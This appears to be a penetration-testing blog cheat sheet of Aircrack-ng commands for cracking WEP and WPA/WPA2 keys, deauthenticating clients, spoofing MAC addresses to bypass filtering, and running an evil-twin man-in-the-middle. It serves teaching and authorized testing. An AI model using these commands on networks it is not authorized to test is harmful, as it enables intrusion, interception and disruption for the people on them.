Denizhalil

Linkedin Github Instagram TryHackMe Youtube Pinterest

Aircrack-Ng Penetration Testing Cheat Sheet

by

In the world of cybersecurity, wireless networks are a common target for attackers. To effectively defend against such threats, it’s crucial to understand how wireless penetration testing works. This cheat sheet provides an overview of essential techniques and commands used in wireless penetration testing.

WIRELESS ANTENNA

Enabling Monitor Mode

Monitor mode is essential for capturing wireless traffic. To enable it, follow these commands:

root@denizhalil:~# ifconfig wlan0mon down
root@denizhalil:~# iwconfig wlan0mon mode monitor
root@denizhalil:~# ifconfig wlan0mon up

Increasing Wi-Fi TX Power

Boosting Wi-Fi transmission power can improve signal strength. Use these commands, but be aware of regulatory limitations:
Before you start, you can check out our article on the best WiFi Adapters for Pentesting

root@denizhalil:~# iw reg set B0
root@denizhalil:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
# Generally, txpower is set to 30
# Txpower depends on your country's regulations, please research
root@denizhalil:~# iwconfig

Changing Wi-Fi Channel

Changing the Wi-Fi channel can help avoid interference. Use this command to set the channel:

root@denizhalil:~# iwconfig wlan0 channel <SetChannel(1-14)>

WEP CRACKING

Method 1: Fake Authentication Attack

WEP cracking involves multiple methods. Here’s the first one, using a fake authentication attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@denizhalil:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2: ARP Replay Attack

Here’s the second method, using an ARP replay attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 3: Chop Chop Attack

For the third method, you can use the Chop Chop attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
 # Press ‘y’ ;
root@denizhalil:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@denizhalil:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@denizhalil:~# aircrack-ng <PCAP_of_FileName>

Method 4: Fragmentation Attack

The fourth method involves a fragmentation attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
# Find your MAC address
root@denizhalil:~# macchanger --show wlan0mon
root@denizhalil:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@denizhalil:~# aireplay-ng -5 –b<BSSID> -h <OurMac> wlan0mon
# Press ‘y’ ;
root@denizhalil:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@denizhalil:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@denizhalil:~# aircrack-ng <PCAP_of_FileName>

Method 5: SKA (Shared Key Authentication) Type Cracking

For the fifth method, use the SKA type cracking approach:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon down
root@denizhalil:~# macchanger –-mac <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon up
root@denizhalil:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
root@denizhalil:~# aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
root@denizhalil:~# aircrack-ng <PCAP_of_FileName>

WPA / WPA2 CRACKING

Method 1: WPS Attack

WPA and WPA2 cracking can be achieved using a WPS attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# apt-get install reaver
root@denizhalil:~#

 wash –i wlan0mon –C
root@denizhalil:~# reaver –i wlan0mon –b <BSSID> -vv –S
# Or, a specific attack
root@denizhalil:~# reaver –i –c <Channel> -b <BSSID> -p <PinCode> -vv –S

Method 2: Dictionary Attack

WPA and WPA2 passwords can also be cracked using a dictionary attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>

Method 3: Crack with John The Ripper

John The Ripper can be used for WPA/WPA2 password cracking:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# cd /pentest/passwords/john
root@denizhalil:~# ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName>

Method 4: Crack with coWPAtty

Use coWPAtty for WPA/WPA2 password cracking:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID>
root@denizhalil:~# genpmk –s <SSID> –f <Wordlist> -d <HashesFileName>
root@denizhalil:~# cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>

Method 5: Crack with Pyrit

Pyrit can also be used for WPA/WPA2 password cracking:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
root@denizhalil:~# pyrit –i <Wordlist> import_passwords
root@denizhalil:~# pyrit –e <ESSID> create_essid
root@denizhalil:~# pyrit batch
root@denizhalil:~# pyrit –r <PCAP_of_FileName> attack_db

Method 6: Precomputed WPA Keys Database Attack

Another method involves a precomputed WPA keys database attack:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# kwrite ESSID.txt
root@denizhalil:~# airolib-ng NEW_DB --import essid ESSID.txt
root@denizhalil:~# airolib-ng NEW_DB --import passwd <DictionaryFile>
root@denizhalil:~# airolib-ng NEW_DB --clean all
root@denizhalil:~# airolib-ng NEW_DB --stats
root@denizhalil:~# airolib-ng NEW_DB --batch
root@denizhalil:~# airolib-ng NEW_DB --verify all
root@denizhalil:~# aircrack-ng –r NEW_DB <Handshaked_PCAP>

FIND HIDDEN SSID

Discovering a hidden SSID requires specific steps:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <Channel> --bssid <BSSID> wlan0mon
root@denizhalil:~# aireplay-ng -0 20 –a <BSSID> -c <VictimMac> wlan0mon

BYPASS MAC FILTERING

To bypass MAC filtering, follow these steps:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@denizhalil:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon down
root@denizhalil:~# macchanger –-mac <VictimMac> wlan0mon
root@denizhalil:~# ifconfig wlan0mon up
root@denizhalil:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon

MAN IN THE MIDDLE ATTACK

Performing a man-in-the-middle attack requires several steps:

root@denizhalil:~# airmon-ng start wlan0
root@denizhalil:~# airbase-ng –e “<FakeBSSID>” wlan0mon
root@denizhalil:~# brctl addbr <VariableName>
root@denizhalil:~# brctl addif <VariableName> wlan0mon
root@denizhalil:~# brctl addif <VariableName> at0
root@denizhalil:~# ifconfig eth0 0.0.0.0 up
root@denizhalil:~# ifconfig at0 0.0.0.0 up
root@denizhalil:~# ifconfig <VariableName> up
root@denizhalil:~# aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon
root@denizhalil:~# dhclient3 <VariableName> &
root@denizhalil:~# wireshark &
; Select

 the <VariableName> interface in Wireshark

Please note that this cheat sheet is provided for educational purposes, and ethical considerations should be observed when conducting wireless penetration testing. Unauthorized access to wireless networks is illegal and unethical. Always obtain proper authorization before performing any penetration testing activities.

Post Views: 379

Leave a Comment

© 2023 Denizhalil All rights reserved

Join our Mailing list!

Get all latest news, exclusive deals and academy updates.